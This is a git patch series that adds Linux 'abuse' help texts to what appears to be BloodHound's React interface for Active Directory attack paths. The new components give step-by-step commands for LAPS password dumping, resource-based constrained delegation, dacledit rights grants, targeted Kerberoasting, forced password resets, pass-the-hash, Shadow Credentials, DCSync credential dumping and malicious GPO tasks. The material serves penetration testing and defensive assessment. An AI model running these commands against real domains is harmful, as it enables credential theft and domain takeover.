--- a/src/components/Modals/HelpTexts/ReadGMSAPassword/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from "react";
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             <p>
@@ -59,4 +59,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

From 7ca242cfaa2efc88627ff615c1c470741599428a Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:40:32 +0100
Subject: [PATCH 24/32] ReadLAPSPassword Linux abuse

---
 .../HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx | 37 +++++++++++++++++++
 .../ReadLAPSPassword/ReadLAPSPassword.jsx     | 14 ++++---
 .../HelpTexts/ReadLAPSPassword/References.jsx |  3 ++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  6 +--
 4 files changed, 52 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/ReadLAPSPassword/{Abuse.jsx => WindowsAbuse.jsx} (93%)

diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
new file mode 100644
index 000000000..aecd018e9
--- /dev/null
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
@@ -0,0 +1,37 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Sufficient control on a computer object is abusable when
+                the computer's local admin account credential is
+                controlled with LAPS. The clear-text password for
+                the local administrator account is stored in an
+                extended attribute on the computer object called
+                ms-Mcs-AdmPwd.
+            </p>
+
+            <p>
+                <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                 to retrieve LAPS passwords:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx
index 905a3b938..8cdf4e1a7 100644
--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const ReadLAPSPassword = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx
index 2b5cd229a..252f59fb7 100644
--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx
@@ -10,6 +10,9 @@ const References = () => {
             <a href='https://adsecurity.org/?p=3164'>
                 https://adsecurity.org/?p=3164
             </a>
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/readlapspassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/readlapspassword
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/ReadLAPSPassword/Abuse.jsx b/src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx
similarity index 93%
rename from src/components/Modals/HelpTexts/ReadLAPSPassword/Abuse.jsx
rename to src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx
index 366699937..8cb245668 100644
--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -40,9 +40,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

From a79a71124e35809eb9b5f0e4c3c3ac6ee94aaeee Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:40:47 +0100
Subject: [PATCH 25/32] WriteAccountRestrictions Linux abuse

---
 .../WriteAccountRestrictions/LinuxAbuse.jsx   | 42 +++++++++++++++++++
 .../WriteAccountRestrictions/References.jsx   | 12 ++++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  4 +-
 .../WriteAccountRestrictions.jsx              | 14 ++++---
 4 files changed, 65 insertions(+), 7 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/WriteAccountRestrictions/{Abuse.jsx => WindowsAbuse.jsx} (97%)

diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx
new file mode 100644
index 000000000..f4469cda1
--- /dev/null
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx
@@ -0,0 +1,42 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            First, if an attacker does not control an account with an
+            SPN set, a new attacker-controlled computer account can be
+            added with Impacket's addcomputer.py example script:
+            <pre>
+                <code>
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            We now need to configure the target object so that the attacker-controlled
+            computer can delegate to it. Impacket's rbcd.py script can be used for that
+            purpose:
+            <pre>
+                <code>
+                    {
+                        "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            And finally we can get a service ticket for the service name (sname) we
+            want to "pretend" to be "admin" for. Impacket's getST.py example script
+            can be used for that purpose.
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                </code>
+            </pre>
+            This ticket can then be used with Pass-the-Ticket, and could grant access
+            to the file system of the TARGETCOMPUTER.
+        </>
+    );
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx
index c158d8c24..40c611c4b 100644
--- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx
@@ -29,6 +29,18 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl'>
+                https://www.thehacker.recipes/ad/movement/dacl
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
+                https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/Abuse.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx
similarity index 97%
rename from src/components/Modals/HelpTexts/WriteAccountRestrictions/Abuse.jsx
rename to src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx
index 61e3d6892..0fe766b97 100644
--- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             Abusing this primitive is currently only possible through the Rubeus
@@ -61,4 +61,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx
index 2f3254bf8..5b0033a7e 100644
--- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const WriteAccountRestrictions = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

From ec3eb5e601d99b50152897faf77b8b03966ef16c Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:41:00 +0100
Subject: [PATCH 26/32] WriteDacl Linux abuse

---
 .../Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx | 583 ++++++++++++++++++
 .../Modals/HelpTexts/WriteDacl/References.jsx |  36 ++
 .../WriteDacl/{Abuse.jsx => WindowsAbuse.jsx} |   6 +-
 .../Modals/HelpTexts/WriteDacl/WriteDacl.jsx  |  20 +-
 4 files changed, 637 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/WriteDacl/{Abuse.jsx => WindowsAbuse.jsx} (99%)

diff --git a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
new file mode 100644
index 000000000..9bb171f05
--- /dev/null
+++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
@@ -0,0 +1,583 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <h4> Modifying the rights </h4>
+
+                    <p>
+                        To abuse WriteDacl to a group object, you may grant
+                        yourself the AddMember privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Adding to the group </h4>
+
+                    <p>
+                        You can now add members to the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Cleanup </h4>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+
+        case 'User':
+            return (
+                <>
+                    <p>
+                        To abuse WriteDacl to a user object, you may grant
+                        yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <p>
+                            To abuse WriteDacl to a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <p>
+                            To abuse WriteDacl to a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        To abuse WriteDacl to a domain object, you may grant
+                        yourself the DcSync privileges.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        If FullControl (GenericAll) is obtained on the domain,
+                        instead of granting DCSync rights, the AllExtendedRights
+                        privilege included grants {sourceName} enough{' '}
+                        privileges to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        To abuse WriteDacl to a GPO, you may
+                        grant yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                    Impacket's dacledit can be used for that purpose (cf.
+                    "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With WriteDacl to an OU object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With WriteDacl to a container object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/WriteDacl/References.jsx b/src/components/Modals/HelpTexts/WriteDacl/References.jsx
index 080522146..d0798d4ce 100644
--- a/src/components/Modals/HelpTexts/WriteDacl/References.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/References.jsx
@@ -42,6 +42,42 @@ const References = () => {
             <a href='https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=netframework-4.8'>
                 https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=netframework-4.8
             </a>
+            <br />
+            <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
+                https://github.com/Kevin-Robertson/Powermad#new-machineaccount
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting'>
+                https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/group-policies'>
+                https://www.thehacker.recipes/ad/movement/group-policies
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials'>
+                https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
+                https://www.thehacker.recipes/ad/movement/dacl/grant-rights
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/WriteDacl/Abuse.jsx b/src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx
similarity index 99%
rename from src/components/Modals/HelpTexts/WriteDacl/Abuse.jsx
rename to src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx
index 56b3098c8..4d622128e 100644
--- a/src/components/Modals/HelpTexts/WriteDacl/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
